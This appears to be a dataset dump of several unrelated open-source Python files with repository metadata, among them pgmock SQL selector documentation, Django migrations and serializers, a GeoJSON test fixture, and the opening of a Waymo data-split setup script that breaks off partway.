"MIT"
] | 3 | 2018-04-30T06:51:33.000Z | 2018-05-30T18:22:58.000Z | tests/output/expected_geojson_output/same_uic_ref_overlapping.py | public-transport-quality-grades/oevgk18-generator | e467587d3d3c600a66139756e95bd84040d58c99 | [
"MIT"
] | null | null | null | result = {
"due-date": "2018-11-13T00:00:00",
"features": [
{
"geometry": {
"coordinates": [
[
[
9.52487,
46.85514
],
[
9.52212,
46.8517
],
[
9.52433,
46.84804
],
[
9.53032,
46.84769
],
[
9.53377,
46.85042
],
[
9.53482,
46.85252
],
[
9.53253,
46.85529
],
[
9.52487,
46.85514
]
]
],
"type": "Polygon"
},
"properties": {
"grade": "B",
"uic_ref": 1
},
"type": "Feature"
},
{
"geometry": {
"coordinates": [
[
[
9.52538,
46.85437
],
[
9.52431,
46.85209
],
[
9.52566,
46.84971
],
[
9.52948,
46.84958
],
[
9.53216,
46.85214
],
[
9.53055,
46.85425
],
[
9.52538,
46.85437
]
]
],
"type": "Polygon"
},
"properties": {
"grade": "A",
"uic_ref": 1
},
"type": "Feature"
}
],
"lower-bound": "06:00",
"type": "FeatureCollection",
"type-of-day": "Working Day",
"type-of-interval": "Day",
"upper-bound": "20:00"
}
| 28.070707 | 38 | 0.16013 | 112 | 2,779 | 3.955357 | 0.517857 | 0.085779 | 0.090293 | 0.058691 | 0.081264 | 0 | 0 | 0 | 0 | 0 | 0 | 0.323923 | 0.757827 | 2,779 | 98 | 39 | 28.357143 | 0.334324 | 0 | 0 | 0.367347 | 0 | 0 | 0.092479 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
74d8eac873d23e014e1ce917809e36fa20929174 | 59 | py | Python | coordination/__init__.py | PhobosXIII/qc | a025e25f9d3fddad1565819010362eb8672c0fa9 | [
"Apache-2.0"
] | null | null | null | coordination/__init__.py | PhobosXIII/qc | a025e25f9d3fddad1565819010362eb8672c0fa9 | [
"Apache-2.0"
] | null | null | null | coordination/__init__.py | PhobosXIII/qc | a025e25f9d3fddad1565819010362eb8672c0fa9 | [
"Apache-2.0"
] | null | null | null | default_app_config = 'coordination.apps.CoordinationConfig' | 59 | 59 | 0.881356 | 6 | 59 | 8.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033898 | 59 | 1 | 59 | 59 | 0.877193 | 0 | 0 | 0 | 0 | 0 | 0.6 | 0.6 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
74f164646bf9105a73d7725d17c38876c0b6ed35 | 702 | py | Python | pythia/opal/content/KeyboardAttributes.py | willic3/pythia | 2657b95a0c07fd3c914ab6b5f7ec89a8edba004c | [
"BSD-3-Clause"
] | 1 | 2015-11-30T08:01:39.000Z | 2015-11-30T08:01:39.000Z | pythia/opal/content/KeyboardAttributes.py | willic3/pythia | 2657b95a0c07fd3c914ab6b5f7ec89a8edba004c | [
"BSD-3-Clause"
] | 27 | 2018-05-24T18:31:25.000Z | 2021-10-16T03:57:52.000Z | pythia/opal/content/KeyboardAttributes.py | willic3/pythia | 2657b95a0c07fd3c914ab6b5f7ec89a8edba004c | [
"BSD-3-Clause"
] | 7 | 2019-07-19T02:30:56.000Z | 2021-06-02T22:00:01.000Z | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
def KeyboardAttributes(object):
def identify(self, inspector):
return inspector.onKeyboardAttributes(self)
def __init__(self):
self.accesskey = ''
self.tabindex = ''
return
# version
__id__ = "$Id: KeyboardAttributes.py,v 1.1 2005/03/20 07:22:58 aivazis Exp $"
# End of file
| 21.9375 | 80 | 0.435897 | 57 | 702 | 5.22807 | 0.754386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046065 | 0.257835 | 702 | 31 | 81 | 22.645161 | 0.525912 | 0.531339 | 0 | 0 | 0 | 0.125 | 0.210191 | 0.073248 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0.125 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
2d026378df64ec8bffa56d192a63dbfd8b0413f9 | 9,185 | py | Python | pgmock/selector.py | cwbane/pgmock | 5c0d2be637c23729a306c0346b9ec1340450a54b | [
"BSD-3-Clause"
] | 54 | 2018-03-29T21:41:41.000Z | 2022-01-26T11:38:22.000Z | pgmock/selector.py | cwbane/pgmock | 5c0d2be637c23729a306c0346b9ec1340450a54b | [
"BSD-3-Clause"
] | 2 | 2018-07-31T19:39:24.000Z | 2020-04-16T06:28:12.000Z | pgmock/selector.py | cwbane/pgmock | 5c0d2be637c23729a306c0346b9ec1340450a54b | [
"BSD-3-Clause"
] | 1 | 2018-08-22T16:15:08.000Z | 2018-08-22T16:15:08.000Z | """
pgmock.selector
---------------
Contains the primary functionality for chainable SQL selectors
"""
import pgmock.exceptions
import pgmock.mocker
import pgmock.render
def body():
"""Obtains the body of a selector.
When applicable, this selector returns the body of another selection.
For example, a ``CREATE TABLE new_table AS SELECT * FROM other_table``
has a body of ``SELECT * FROM other_table``.
Returns:
Selector: A chainable SQL selector.
Examples:
Obtain the body of a ``CREATE TABLE AS`` expression
.. code-block:: python
body = pgmock.sql(sql_string, pgmock.create_table_as('table').body())
Obtain the body of an ``INSERT INTO`` expression using the syntax of
passing multiple selectors to ``pgmock.sql``
.. code-block:: python
body = pgmock.sql(sql_string, pgmock.insert_into('table'), pgmock.body())
Note:
This selector should only be used to refine another selector, such as
``pgmock.create_table_as`` or ``pgmock.insert_into``. In other words, calling:
.. code-block:: python
body = pgmock.sql(sql_string, pgmock.body())
will result in an error.
"""
return Selector().body()
def statement(start, end=None):
"""Obtains a statement selector.
Statements are naively parsed by splitting SQL based on the semicolon.
If any semicolons exist in the comments or literal strings, this
selector has undefined behavior.
Args:
start (int): The starting statement. If ``end`` is ``None``,
obtain a single statement
end (int, optional): The ending statement (exclusive)
Returns:
Selector: A chainable SQL selector.
Raises:
`StatementParseError`: When the statement range is invalid for the
parsed statements.
Examples:
Obtain the first statement in a SQL string
.. code-block:: python
statement = pgmock.sql(sql_string, pgmock.statement(0))
Obtain the second and third statements in a SQL string
.. code-block:: python
statement = pgmock.sql(sql_string, pgmock.statement(1, 3))
"""
return Selector().statement(start, end=end)
def insert_into(table):
"""Obtains a selector for an ``INSERT INTO`` expression.
Searches for ``INSERT INTO table_name(optional columns)`` and returns
the entire statement. The body of the statement (e.g. the ``SELECT`` or anything after
``INSERT INTO``) can be returned by chaining the ``body()`` selector.
Args:
table (str): The table of the expression.
Returns:
Selector: A chainable SQL selector.
Raises:
`NoMatchError`: When the expression cannot be found during rendering.
`MultipleMatchError`: When multiple expressions are found during rendering.
Examples:
Obtain the ``INSERT INTO`` of table "t"
.. code-block:: python
insert_into = pgmock.sql(sql_string, pgmock.insert_into('t'))
Obtain the body of the ``INSERT INTO`` of table "t"
.. code-block:: python
insert_into_body = pgmock.sql(sql_string, pgmock.insert_into('t').body())
Note:
When patching ``INSERT INTO`` statements, the entire body of the statement after the
``INSERT INTO`` is patched
"""
return Selector().insert_into(table)
def cte(alias):
"""Obtains a selector for a common table expression (CTE)
CTEs are matched by searching for a ``WITH cte_name AS`` or for searching
for a CTE after a comma (e.g ``WITH cte_name1 AS ..., cte_name2 AS ...``)
Args:
alias (str): The alias of the CTE
Returns:
Selector: A chainable SQL selector
Raises:
`NoMatchError`: When the CTE cannot be found during rendering.
`MultipleMatchError`: When multiple CTEs are found during rendering.
`NestedMatchError`: When nested subquery matches are found during rendering.
`InvalidSQLError`: When enclosing parentheses for a CTE
cannot be found.
Examples:
Obtain the CTE that has the alias "a"
.. code-block:: python
cte = pgmock.sql(sql_string, pgmock.cte('a'))
"""
return Selector().cte(alias)
def subquery(alias):
"""Obtains a selector for a subquery
Subqueries are matched by an alias preceeded by an enclosing
parenthesis. Once matched, the SQL is search for the starting
parenthesis.
Args:
alias (str): The alias of the subquery.
Returns:
Selector: A chainable SQL selector.
Raises:
`NoMatchError`: When the expression cannot be found during rendering.
`MultipleMatchError`: When multiple expressions are found during rendering.
`NestedMatchError`: When nested subquery matches are found during rendering.
`InvalidSQLError`: When enclosing parentheses for a subquery
cannot be found.
Examples:
Obtain the subquery that has the alias "a"
.. code-block:: python
subquery = pgmock.sql(sql_string, pgmock.subquery('a'))
Todo:
- Support for subqueries without an alias (e.g. after an "in" keyword)
"""
return Selector().subquery(alias)
def table(name, alias=None):
"""Obtains a selector for a table
Tables are matched by searching for their name and optional
aliases after a ``FROM`` or ``JOIN`` keyword. If the table has an alias
but the alias isn't provided, a `NoMatchError` will be thrown.
Args:
name (str): The name of the table (including the schema if in the query)
alias (str, optional): The alias of the table if it exists
Returns:
Selector: A chainable SQL selector.
Raises:
`NoMatchError`: When the expression cannot be found during rendering.
`MultipleMatchError`: When multiple expressions are found during rendering.
Examples:
Obtain the table with no alias that has the name "schema.table_name"
.. code-block:: python
table = pgmock.sql(sql_string, pgmock.table('schema.table_name'))
Obtain the table with the name "schema.table_name" that has the alias "a"
.. code-block:: python
table = pgmock.sql(sql_string, pgmock.table('schema.table_name', 'a'))
Todo:
- Support lateral joins and other joins that have keywords after
the ``JOIN`` keyword
"""
return Selector().table(name, alias=alias)
def create_table_as(table):
"""Obtains a selector for a ``CREATE TABLE AS`` statement.
Searches for ``CREATE TABLE table_name(optional columns) AS`` and returns
the entire statement. The body of the statement (e.g. the ``SELECT`` or anything after
``CREATE TABLE AS``) can be returned by chaining the ``body()`` selector.
Args:
table (str): The name of the table as referenced in the expression
Returns:
Selector: A chainable SQL selector.
Raises:
`NoMatchError`: When the expression cannot be found during rendering.
`MultipleMatchError`: When multiple expressions are found during rendering.
Examples:
Obtain the ``CREATE TABLE AS`` of table "t"
.. code-block:: python
ctas = pgmock.sql(sql_string, pgmock.create_table_as('t'))
Obtain the body of the ``CREATE TABLE AS`` of table "t"
.. code-block:: python
ctas_body = pgmock.sql(sql_string, pgmock.create_table_as('t').body())
Note:
When patching ``CREATE TABLE AS`` statements, the entire body of the statement is patched
with a ``SELECT * FROM VALUES ... AS pgmock(columns...)``. This is because it is illegal
to do ``VALUES ... AS ...`` after a "create table as" statement.
"""
return Selector().create_table_as(table)
class Selector(pgmock.render.Renderable):
"""A selector for targetting expressions in SQL.
Methods can be chained to represent what is being targetted, for example a
subquery in the first statement::
Selector().statement(0).subquery('alias')
Once ``patch`` is applied to a selector, a ``Mock`` object is returned and
only ``patch`` can be chained.
"""
@pgmock.render.Renderable.chainable_render_method
def __getitem__(self, index):
pass
@pgmock.render.Renderable.chainable_render_method
def statement(self, start, end=None):
pass
@pgmock.render.Renderable.chainable_render_method
def body(self):
pass
@pgmock.render.Renderable.chainable_render_method
def cte(self, alias):
pass
@pgmock.render.Renderable.chainable_render_method
def insert_into(self, table):
pass
@pgmock.render.Renderable.chainable_render_method
def subquery(self, alias):
pass
@pgmock.render.Renderable.chainable_render_method
def table(self, table, alias=None):
pass
@pgmock.render.Renderable.chainable_render_method
def create_table_as(self, table):
pass
def patch(self, *args, **kwargs):
return pgmock.mocker.Mocker(renderable=self).patch(*args, **kwargs)
| 30.213816 | 97 | 0.657376 | 1,178 | 9,185 | 5.066214 | 0.167233 | 0.028485 | 0.030496 | 0.039209 | 0.545409 | 0.496146 | 0.460958 | 0.425436 | 0.363438 | 0.308143 | 0 | 0.000872 | 0.250517 | 9,185 | 303 | 98 | 30.313531 | 0.866066 | 0.762657 | 0 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006601 | 0 | 1 | 0.363636 | false | 0.181818 | 0.068182 | 0.022727 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
2d21657ca0ef41aaa023846b0dd757a170b8bb63 | 211 | py | Python | game/serializers/question_with_answer_serializer.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | [
"MIT"
] | null | null | null | game/serializers/question_with_answer_serializer.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | [
"MIT"
] | null | null | null | game/serializers/question_with_answer_serializer.py | dimadk24/english-fight-api | 506a3eb2cb4cb91203b1e023b5248c27975df075 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from game.serializers.question_serializer import QuestionSerializer
class QuestionWithAnswerSerializer(QuestionSerializer):
correct_answer = serializers.CharField()
| 26.375 | 67 | 0.862559 | 19 | 211 | 9.421053 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094787 | 211 | 7 | 68 | 30.142857 | 0.937173 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
2d330ccf20b0bd4e34bb3a01592990cc76bca7e3 | 188 | py | Python | music/shape/audio/fourier/coefficient/alpha.py | jedhsu/music | dea68c4a82296cd4910e786f533b2cbf861377c3 | [
"MIT"
] | null | null | null | music/shape/audio/fourier/coefficient/alpha.py | jedhsu/music | dea68c4a82296cd4910e786f533b2cbf861377c3 | [
"MIT"
] | null | null | null | music/shape/audio/fourier/coefficient/alpha.py | jedhsu/music | dea68c4a82296cd4910e786f533b2cbf861377c3 | [
"MIT"
] | null | null | null | """
*Alpha-Coefficient*
The alpha term in the fourier coefficient.
"""
from ._coefficient import FourierCoefficient
class AlphaCoefficient(
FourierCoefficient,
):
pass
| 11.75 | 44 | 0.712766 | 17 | 188 | 7.823529 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.207447 | 188 | 15 | 45 | 12.533333 | 0.892617 | 0.335106 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.2 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
74321ea05511377ab22824f92434af97786eebc8 | 244 | py | Python | testdust/diffusion/__init__.py | ibackus/testdust | 29e78e4cd2f3466dd503ce863c6db9014da07a04 | [
"MIT"
] | null | null | null | testdust/diffusion/__init__.py | ibackus/testdust | 29e78e4cd2f3466dd503ce863c6db9014da07a04 | [
"MIT"
] | null | null | null | testdust/diffusion/__init__.py | ibackus/testdust | 29e78e4cd2f3466dd503ce863c6db9014da07a04 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This package is for generating and analyzing the dustydiffusion test of
Price & Laibe 2015
Created on Thu Mar 16 16:41:03 2017
@author: ibackus
"""
import makeICs
import analyze
import plot
| 17.428571 | 72 | 0.72541 | 38 | 244 | 4.657895 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089109 | 0.172131 | 244 | 13 | 73 | 18.769231 | 0.787129 | 0.778689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
743e11b982ff87c2f24d05433bb89f04a4d05e68 | 585 | py | Python | client/collectors/collector.py | lxy20/django-postgres-stack | d6388beb7f6f23fe6b08843c7c133888b970d3f5 | [
"BSD-Source-Code"
] | 4 | 2020-01-26T03:13:39.000Z | 2020-06-16T07:15:52.000Z | client/collectors/collector.py | lxy20/django-postgres-stack | d6388beb7f6f23fe6b08843c7c133888b970d3f5 | [
"BSD-Source-Code"
] | 18 | 2020-01-30T06:05:21.000Z | 2022-02-26T21:45:39.000Z | client/collectors/collector.py | huijiancai99/pgperffarm | 8657ab84c555085763ef494d0ca5eae0d69f43a3 | [
"BSD-Source-Code"
] | 6 | 2020-01-26T03:47:09.000Z | 2020-03-20T06:55:05.000Z |
class MultiCollector(object):
'a collector combining multiple other collectors'
def __init__(self):
self._collectors = {}
def register(self, name, collector):
self._collectors[name] = collector
def start(self):
for name in self._collectors:
self._collectors[name].start()
def stop(self):
for name in self._collectors:
self._collectors[name].stop()
def result(self):
r = {}
for name in self._collectors:
r.update({name: self._collectors[name].result()})
return r
| 23.4 | 61 | 0.601709 | 65 | 585 | 5.230769 | 0.338462 | 0.329412 | 0.211765 | 0.114706 | 0.332353 | 0.264706 | 0.264706 | 0.264706 | 0.264706 | 0 | 0 | 0 | 0.290598 | 585 | 24 | 62 | 24.375 | 0.819277 | 0.080342 | 0 | 0.176471 | 0 | 0 | 0.080479 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7443b633febb6146eb36d1d718e8670523cfb0c3 | 5,602 | py | Python | netmgt/migrations/0001_initial.py | drscream/django-netmgt | 9c9c2b393d378e52d5bf6d012920a8976acd60dc | [
"BSD-2-Clause"
] | 1 | 2017-10-13T15:55:45.000Z | 2017-10-13T15:55:45.000Z | netmgt/migrations/0001_initial.py | drscream/django-netmgt | 9c9c2b393d378e52d5bf6d012920a8976acd60dc | [
"BSD-2-Clause"
] | null | null | null | netmgt/migrations/0001_initial.py | drscream/django-netmgt | 9c9c2b393d378e52d5bf6d012920a8976acd60dc | [
"BSD-2-Clause"
] | 2 | 2016-05-05T15:00:11.000Z | 2018-03-11T17:01:30.000Z | # Generated by Django 2.2.6 on 2019-10-29 09:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CachedZone',
fields=[
('key', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
('tag', models.CharField(max_length=250)),
('value', models.TextField(max_length=250)),
('updated', models.DateTimeField()),
],
),
migrations.CreateModel(
name='Contact',
fields=[
('nick', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
('name', models.CharField(max_length=250)),
('email', models.EmailField(max_length=254)),
],
),
migrations.CreateModel(
name='DeviceType',
fields=[
('name', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
],
),
migrations.CreateModel(
name='OperatingSystem',
fields=[
('name', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
],
),
migrations.CreateModel(
name='Template',
fields=[
('name', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
],
),
migrations.CreateModel(
name='Zone',
fields=[
('name', models.CharField(max_length=250, primary_key=True, serialize=False, unique=True)),
('ttl', models.IntegerField(blank=True, null=True, verbose_name='TTL')),
('templates', models.ManyToManyField(blank=True, to='netmgt.Template')),
],
),
migrations.CreateModel(
name='ZoneRecord',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=250)),
('ttl', models.IntegerField(blank=True, null=True, verbose_name='TTL')),
('type', models.CharField(choices=[('A', 'A'), ('AAAA', 'AAAA'), ('CAA', 'CAA'), ('CERT', 'CERT'), ('CNAME', 'CNAME'), ('DNSKEY', 'DNSKEY'), ('DS', 'DS'), ('DNSKEY', 'DNSKEY'), ('KEY', 'KEY'), ('LOC', 'LOC'), ('MX', 'MX'), ('NAPTR', 'NAPTR'), ('NS', 'NS'), ('NSEC', 'NSEC'), ('PTR', 'PTR'), ('RRSIG', 'RRSIG'), ('SPF', 'SPF'), ('SRV', 'SRV'), ('TXT', 'TXT')], max_length=8)),
('value', models.CharField(max_length=250)),
('zone', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='records', to='netmgt.Zone')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TemplateRecord',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=250)),
('ttl', models.IntegerField(blank=True, null=True, verbose_name='TTL')),
('type', models.CharField(choices=[('A', 'A'), ('AAAA', 'AAAA'), ('CAA', 'CAA'), ('CERT', 'CERT'), ('CNAME', 'CNAME'), ('DNSKEY', 'DNSKEY'), ('DS', 'DS'), ('DNSKEY', 'DNSKEY'), ('KEY', 'KEY'), ('LOC', 'LOC'), ('MX', 'MX'), ('NAPTR', 'NAPTR'), ('NS', 'NS'), ('NSEC', 'NSEC'), ('PTR', 'PTR'), ('RRSIG', 'RRSIG'), ('SPF', 'SPF'), ('SRV', 'SRV'), ('TXT', 'TXT')], max_length=8)),
('value', models.CharField(max_length=250)),
('template', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='records', to='netmgt.Template')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Device',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('info', models.CharField(blank=True, max_length=250)),
('contact', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='netmgt.Contact')),
('os', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='netmgt.OperatingSystem', verbose_name='Operating System')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='netmgt.DeviceType')),
],
),
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip', models.GenericIPAddressField()),
('prefix_len', models.IntegerField(verbose_name='Prefix Length')),
('name', models.CharField(max_length=250)),
('reverse_zone', models.CharField(max_length=250)),
('device', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='netmgt.Device')),
('zone', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='addresses', to='netmgt.Zone')),
],
),
]
| 50.927273 | 391 | 0.544091 | 549 | 5,602 | 5.449909 | 0.191257 | 0.06016 | 0.068182 | 0.104278 | 0.750334 | 0.732286 | 0.677473 | 0.665441 | 0.665441 | 0.665441 | 0 | 0.017419 | 0.272403 | 5,602 | 109 | 392 | 51.394495 | 0.716634 | 0.008033 | 0 | 0.627451 | 1 | 0 | 0.133393 | 0.00396 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.019608 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
744d99c237509f277cae64b7e0c4abf3eccd8e90 | 182 | py | Python | lists.py | the-visserd/two-hearts | fa45b04d36abf73db82b491c127e1c4b9889aa5c | [
"MIT"
] | null | null | null | lists.py | the-visserd/two-hearts | fa45b04d36abf73db82b491c127e1c4b9889aa5c | [
"MIT"
] | null | null | null | lists.py | the-visserd/two-hearts | fa45b04d36abf73db82b491c127e1c4b9889aa5c | [
"MIT"
] | null | null | null | # Set number of participants
num_dyads = 4
num_participants = num_dyads*2
# Create lists for iterations
participants = list(range(num_participants))
dyads = list(range(num_dyads)) | 20.222222 | 44 | 0.785714 | 26 | 182 | 5.307692 | 0.538462 | 0.173913 | 0.289855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0.131868 | 182 | 9 | 45 | 20.222222 | 0.860759 | 0.296703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
746822afae34fec9032ebce30234428dc8e3a1c7 | 142 | py | Python | 12_module_basic/17_controller/mod.py | hemuke/python | bc99f2b5aee997083ae31f59a2b33db48c8255f3 | [
"Apache-2.0"
] | null | null | null | 12_module_basic/17_controller/mod.py | hemuke/python | bc99f2b5aee997083ae31f59a2b33db48c8255f3 | [
"Apache-2.0"
] | null | null | null | 12_module_basic/17_controller/mod.py | hemuke/python | bc99f2b5aee997083ae31f59a2b33db48c8255f3 | [
"Apache-2.0"
] | null | null | null | __all__ = ['v1', 'f1', 'C1']
v1 = 18
v2 = 36
def f1():
pass
def f2():
pass
class C1(object):
pass
class C2(object):
pass
| 8.352941 | 28 | 0.514085 | 22 | 142 | 3.136364 | 0.590909 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132653 | 0.309859 | 142 | 16 | 29 | 8.875 | 0.571429 | 0 | 0 | 0.363636 | 0 | 0 | 0.042254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0.363636 | 0 | 0 | 0.363636 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
748e02775d6258ca295750d371d7fffab61b2dec | 6,151 | py | Python | data/waymo_split/setup_split.py | JuliaChae/M3D-RPN-Waymo | e73cba585563a094f67a2ba184a22330c134857c | [
"MIT"
] | 3 | 2021-03-30T17:36:29.000Z | 2021-12-07T03:02:43.000Z | data/waymo_split/setup_split.py | JuliaChae/M3D-RPN-Waymo | e73cba585563a094f67a2ba184a22330c134857c | [
"MIT"
] | 2 | 2021-02-11T15:29:46.000Z | 2021-07-19T15:03:15.000Z | data/waymo_split/setup_split.py | JuliaChae/M3D-RPN-Waymo | e73cba585563a094f67a2ba184a22330c134857c | [
"MIT"
] | null | null | null | from importlib import import_module
from getopt import getopt
import scipy.io as sio
import matplotlib.pyplot as plt
from matplotlib.path import Path
import numpy as np
import pprint
import sys
import os
import cv2
import math
import shutil
import re
# stop python from writing so much bytecode
sys.dont_write_bytecode = True
sys.path.append(os.getcwd())
np.set_printoptions(suppress=True)
# -----------------------------------------
# custom modules
# -----------------------------------------
from lib.util import *
split = 'waymo_split'
cam_num = 1
cam_view = '_frontleft'
# base paths
base_data = os.path.join(os.getcwd(), 'data')
waymo_raw_tra = dict()
waymo_raw_tra['cal'] = os.path.join(base_data, 'waymo', 'training', 'calib')
waymo_raw_tra['ims'] = os.path.join(base_data, 'waymo', 'training', 'image_{}'.format(cam_num))
waymo_raw_tra['lab'] = os.path.join(base_data, 'waymo', 'training', 'label_{}'.format(cam_num))
waymo_raw_tra['pre'] = os.path.join(base_data, 'waymo', 'training', 'prev_{}'.format(cam_num))
waymo_tra = dict()
waymo_tra['cal'] = os.path.join(base_data, split, 'training' + cam_view, 'calib')
waymo_tra['ims'] = os.path.join(base_data, split, 'training' + cam_view, 'image_{}'.format(cam_num))
waymo_tra['lab'] = os.path.join(base_data, split, 'training' + cam_view, 'label_{}'.format(cam_num))
